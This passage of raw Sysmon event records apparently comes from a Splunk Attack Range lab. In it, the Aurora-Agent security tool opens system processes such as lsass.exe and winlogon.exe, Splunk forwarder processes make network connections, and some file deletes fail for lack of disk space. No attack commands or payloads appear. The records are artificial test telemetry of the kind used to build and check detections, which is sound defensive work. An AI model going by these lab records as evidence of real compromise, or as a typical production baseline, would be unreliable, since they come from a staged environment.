Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017657Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.738{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017656Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.736{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017655Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.735{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017654Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.728{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017653Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.728{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017652Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.724{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017651Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.722{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017650Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.716{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017649Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.713{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017648Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.711{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017647Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.702{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017646Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.697{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017645Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.689{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017644Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.686{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017643Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.667{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017642Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.656{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017641Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.646{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017640Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.638{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017639Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.629{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017638Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.591{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017637Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.583{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017636Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.575{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017635Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.562{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017634Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.556{E5A8D418-DC44-63C7-1C00-00000000B002}20203052C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132003D0) 10341000x800000000000000017633Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.551{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017632Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.547{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017631Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.540{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 354300x800000000000000045241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:19.603{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56417-false10.0.1.12-8000- 23542300x800000000000000045243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:23.923{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=934FC4E856D01F98F8022D9AC58A65A7,SHA256=ECC6A00D92909C941A3D84644DB46379165551F0103F45DAFB815B6158942877,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017663Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:21.077{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50147-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017662Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:23.119{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7115C629FCE52D5A2158831AA8507D2D,SHA256=D8ADF371C8150088EF9050BA1B8141EF565CA0F098AF09326A761B1563263022,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017664Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:24.165{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7CE891B57D125C36A78B976F4A1F042,SHA256=34EF754FC68E30CBDA77BC6886593B5680279F436C41BC3AE8173E8A08C07D58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:25.018{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16A2AEE7BAE991067206B993D7CC84EB,SHA256=0E33E191B09CD8671FC976E7AEB047BBF4B29D1998A7DA397A6FA776E1BCB537,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017669Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 